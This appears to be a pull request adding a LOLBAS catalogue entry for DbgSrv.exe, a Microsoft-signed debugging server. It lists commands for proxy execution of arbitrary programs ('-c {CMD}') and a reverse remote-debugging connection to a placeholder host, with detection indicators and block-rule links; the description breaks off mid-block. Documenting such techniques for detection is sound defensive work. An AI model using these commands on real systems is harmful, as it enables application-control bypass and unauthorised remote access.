### PR TITLE
Add DbgSrv.exe trusted developer utility proxy execution

### DIFF
--- a/yml/OtherMSBinaries/Dbgsrv.yml
+++ b/yml/OtherMSBinaries/Dbgsrv.yml
@@ -1,0 +1,53 @@
+---
+Name: DbgSrv.exe
+Description: A process server included with Debugging Tools for Windows for remote user-mode debugging.
+Author: Phyo Paing Htun
+Created: 2026-07-29
+Commands:
+  - Command: dbgsrv.exe -t tcp:port=5005 -c {CMD}
+    Description: Creates a process server and launches the specified command using the DbgSrv.exe -c option.
+    Usecase: Proxy execution of a command through a trusted Microsoft-signed debugging utility.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+    Tags:
+      - Execute: CMD
+
+  - Command: dbgsrv.exe -t tcp:clicon={HOST},port={PORT}
+    Description: Establishes an outbound reverse connection from the DbgSrv process server to a remote debugging client using the clicon option. A connected debugging client can subsequently interact with processes through the remote debugging session.
+    Usecase: Establish a reverse remote-debugging channel through a trusted Microsoft-signed developer utility.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
+    Tags:
+      - Execute: Remote
+
+Full_Path:
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbgsrv.exe
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\dbgsrv.exe
+  - Path: C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe
+  - Path: C:\Program Files\Debugging Tools for Windows (x86)\dbgsrv.exe
+
+Code_Sample:
+  - Code: https://gist.github.com/analyticsearch/de5c05229d5bf4f8c72016a2a43034eb
+
+Detection:
+  - IOC: DbgSrv.exe spawning a child process after execution with the -c option.
+  - IOC: DbgSrv.exe command lines containing -c, -pc, clicon=, or hidden.
+  - IOC: DbgSrv.exe establishing an unexpected outbound connection to an external host.
+  - IOC: DbgSrv.exe communicating over ports that are not approved for remote debugging.
+  - IOC: DbgSrv.exe executed from outside an expected Windows Kits or Debugging Tools directory.
+  - IOC: DbgSrv.exe spawning a command interpreter, script engine, or executable from a user-writable directory.
+  - IOC: A normally network-inactive process, such as notepad.exe, initiating an external connection shortly after DbgSrv.exe establishes a connection to the same host or infrastructure.
+  - IOC: DbgSrv.exe launched by explorer.exe on a system where interactive remote debugging is not expected.
+  - BlockRule: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
+
+Resources:
+  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/dbgsrv-command-line-options
+  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/activating-a-process-server
+  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools
+  - Link: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
+  - Link: https://redcanary.com/blog/threat-detection/black-hat-detecting-the-unknown-and-disclosing-a-new-attack-technique/
+  - Link: https://gist.github.com/analyticsearch/de5c05229d5bf4f8c72016a2a43034eb

--- a/yml/OtherMSBinaries/Dbgsrv.yml
+++ b/yml/OtherMSBinaries/Dbgsrv.yml
@@ -54,3 +54,7 @@ Resources:
   - Link: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
   - Link: https://redcanary.com/blog/threat-detection/black-hat-detecting-the-unknown-and-disclosing-a-new-attack-technique/
   - Link: https://gist.github.com/analyticsearch/de5c05229d5bf4f8c72016a2a43034eb
+
+Acknowledgement:
+  - Person: PHYO PAING HTUN
+    Handle: '@PhyoPaingHtun'

--- a/yml/OtherMSBinaries/Dbgsrv.yml
+++ b/yml/OtherMSBinaries/Dbgsrv.yml
@@ -32,6 +32,7 @@ Full_Path:
 
 Code_Sample:
   - Code: https://gist.github.com/analyticsearch/de5c05229d5bf4f8c72016a2a43034eb
+  - Code: https://github.com/user-attachments/files/30500523/Invoke-DbgSrvLolbas.zip
 
 Detection:
   - IOC: DbgSrv.exe spawning a child process after execution with the -c option.
@@ -45,6 +46,8 @@ Detection:
   - BlockRule: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
 
 Resources:
+  - Link: https://github.com/user-attachments/assets/ff08bc79-4cca-4bf8-b659-7025a99c443f
+  - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/516#issuecomment-5116289639
   - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/dbgsrv-command-line-options
   - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/activating-a-process-server
   - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools


### PR DESCRIPTION
## Summary

This pull request adds `DbgSrv.exe` as a new LOLBAS entry under:

`yml/OtherMSBinaries/DbgSrv.yml`

`DbgSrv.exe` is the Microsoft-signed process server included with
Debugging Tools for Windows. It is installed through Microsoft's Windows
SDK/WDK debugging-tools package and is not normally present on a default
Windows installation.

The proposed entry documents the ability of `DbgSrv.exe` to:

1. Create an arbitrary process through the documented `-c` option.
2. Act as a trusted Microsoft-signed execution proxy.
3. Expose a debugging transport that can support remote debugging.
4. Establish a reverse debugging connection through the documented
   `clicon=` transport option.

The primary behavior reproduced in my lab was:

```cmd
dbgsrv.exe -t tcp:port=5005 -c {CMD}